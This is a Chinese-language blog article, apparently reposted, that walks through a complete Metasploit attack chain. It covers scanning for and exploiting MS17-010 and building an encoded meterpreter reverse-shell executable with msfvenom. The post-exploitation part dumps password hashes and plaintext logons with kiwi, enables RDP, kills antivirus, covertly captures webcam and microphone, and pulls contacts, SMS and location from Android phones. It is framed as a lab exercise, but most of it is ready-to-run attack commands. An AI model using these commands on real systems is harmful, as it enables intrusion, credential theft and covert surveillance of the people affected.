| |
|
开发:
C++知识库
Java知识库
JavaScript
Python
PHP知识库
人工智能
区块链
大数据
移动开发
嵌入式
开发工具
数据结构与算法
开发测试
游戏开发
网络协议
系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程 数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁 |
-> 网络协议 -> metasploit完整的使用流程包括meterpreter后渗透 -> 正文阅读 |
|
[网络协议]metasploit完整的使用流程包括meterpreter后渗透 |
metasploit完整的使用流程包括meterpreter后渗透主机发现主机为win10 基于ARP发现内网存活主机auxiliary/scanner/discovery/arp_sweep 基于FTP服务auxiliary/scanner/ftp/ftp_version 基于HTTP服务auxiliary/scanner/http/http_version 开启服务 再次扫描 基于SMBauxiliary/scanner/smb/smb_version 漏洞扫描查看是否有ms17_010漏洞 利用辅助模块,扫描该主机是否有该漏洞 漏洞渗透利用利用ms17_010
利用植入木马
msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=192.168.202.133 LPORT=4446 -e x86/shikata_ga_nai -b ‘\x00\x0a\xff’ -i 10 -f exe -o payload.exe
python -m SimpleHTTPServer 80
use exploit/multi/handler 3.1 然后我们配置了 lhost (lhost指的是 监控主机或攻击机 ip) set lhost ip 3.2然后我们配置了 lport (指的是监控的端口 ) set lport ip 注意端口必须和msfvenom 生成的木马端口一样才行
set payload windows/meterpreter/reverse_tcp
利用成功并获得meterpreter 后渗透meterpreterMeterpreter是Metasploit框架中的一个利器,作为漏洞溢出后的攻击载荷使用,攻击载荷在触发漏洞后会返回一个由我们控制的通道,可用于远程执行命令! meterpreter常用反弹类型reverse_tcp 获取登录密码首先获得一个有SYSTEM权限的meterpreter 很多人喜欢给在计算机设置自动登录 我们可以通过抓取自动登录的账户密码 run windows/gather/credentials/windows_autologin 提示这证明本机并没有配置自动登录
使用 hashdump 获取密码(注意需要提权到SYSTEM才能使用) 终端内输入 run hashdump 使用在线解析工具 : CMD5 NTLM哈希 例子:32ed87bdb5fdc5e9cba88547376818d4 假如此刻无法获取密码 使用 kiwi_cmd sekurlsa::logonpasswords 获取密码
远程控制环境准备win10 rdesktop Debian,Ubuntu,kali下使用以下命令 apt-get install rdesktop Centos/RedHat可以通过yum命令 yum -y install rdesktop 实战使用rdesktop远程控制 rdesktop常用参数
rdesktop -u 用户名 -p 密码 -f IP rdesktop -u zxh -p zxh -f -g 1024x720 192.168.202.139 如果远程计算机没有启动远程功能我们可以在meterpreter中输入 启动远程桌面协议:run post/windows/manage/enable_rdp 2 通过vnc远程 调用摄像头环境准备1 MSF-Metasploit Framework 2 一台windiows靶机 3 一台安卓设备,没有可以使用模拟器 实战靶机获取到meterpreter后我们可以使用 webcam模块实现调用软,硬件摄像头 webcam模块支持命令
1 webcam_list 2 webcam_snap 调用单个软,硬件摄像头拍照
3 webcam_stream 调用单个软,硬件摄像头直播
meterpreter常用命令background返回,把meterpreter后台挂起 sessions查看当前建立的会话 bgkill杀死一个 meterpreter 脚本 bglist提供所有正在运行的后台脚本的列表 bgrun作为一个后台线程运行脚本 channel显示活动频道 close关闭通道 exit终止 meterpreter 会话 quit终止 meterpreter 会话 interact id切换进一个信道 run执行一个已有的模块,这里要说的是输入run后按两下tab,会列出所有的已有的脚本,常用的autoroute,hashdump,arp_scanner,multi_meter_inject等 irb进入 Ruby 脚本模式 read从通道读取数据write# 将数据写入到一个通道 run和bgrun前台和后台执行以后它选定的 meterpreter 脚本 use加载 meterpreter 的扩展 load/use加载模块 针对安卓手机获取手机通讯录: dump_contacts 获取短信记录:dump_sms 控制实验手机发短信:send_sms -d 15330252525 -t 获取实验手机GPS定位信息:geolocate 获取实验手机Wi-Fi定位信息:wlan_geolocate 控制实验手机录音:record_mic 获取实验手机相机设备:webcam_list 控制实验手机拍照 :webcam_snap 直播实验手机摄像头:webcam_stream 针对Windows的一些命令ps查看进程: getpid查看当前进程号: sysinfo查看系统信息: route查看完整网络设置: getsystem自动提权: getuid查看当前权限: pwd查看当前处于目标机的那个目录: 其他使用查看目标机是否为虚拟机:run post/windows/gather/checkvm 关闭杀毒软件:run post/windows/manage/killav 启动远程桌面协议:run post/windows/manage/enable_rdp 列举当前登录的用户:run post/windows/gather/enum_logged_on_users 查看当前应用程序:run post/windows/gather/enum_applications 抓取目标机的屏幕截图:load espia ; screengrab 获取相机设备:webcam_list 控制拍照 :webcam_snap 直播摄像头:webcam_stream 控制录音:record_mic 查看当前目录:getlwd 导出当前用户密码哈希 run hashdump 用户名:SID:LM哈希:NTLM哈希::: 也可以使用下面这个命令导出 权限更高 run windows/gather/smart_hashdump 抓取自动登录的用户名和密码 run windows/gather/credentials/windows_autologin 直接获取明文密码(注意这个功能需要获取系统权限 获取系统权限需要输入getsystem) shell进入Windows的终端shell 文件系统命令文件交互指令
Linux权限理解 chmod 777 {文件名.后缀} chmod 777 shell.elf upload上传文件到目标机主上,如upload setup.exe C:\windows\system32 searchsearch 文件,如search -d c:\ -f*.doc enumdesktops用户登录数 ipconfig查看IP地址 PHP后门反弹连接永恒之蓝CVE-2017-0144震网三代CVE-2017-8464永恒之黑CVE-2020-0796 |
|
网络协议 最新文章 |
使用Easyswoole 搭建简单的Websoket服务 |
常见的数据通信方式有哪些? |
Openssl 1024bit RSA算法---公私钥获取和处 |
HTTPS协议的密钥交换流程 |
《小白WEB安全入门》03. 漏洞篇 |
HttpRunner4.x 安装与使用 |
2021-07-04 |
手写RPC学习笔记 |
K8S高可用版本部署 |
mySQL计算IP地址范围 |
|
上一篇文章 下一篇文章 查看所有文章 |
|
开发:
C++知识库
Java知识库
JavaScript
Python
PHP知识库
人工智能
区块链
大数据
移动开发
嵌入式
开发工具
数据结构与算法
开发测试
游戏开发
网络协议
系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程 数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁 |
360图书馆 购物 三丰科技 阅读网 日历 万年历 2024年11日历 | -2024/11/26 4:37:47- |
|
网站联系: qq:121756557 email:121756557@qq.com IT数码 |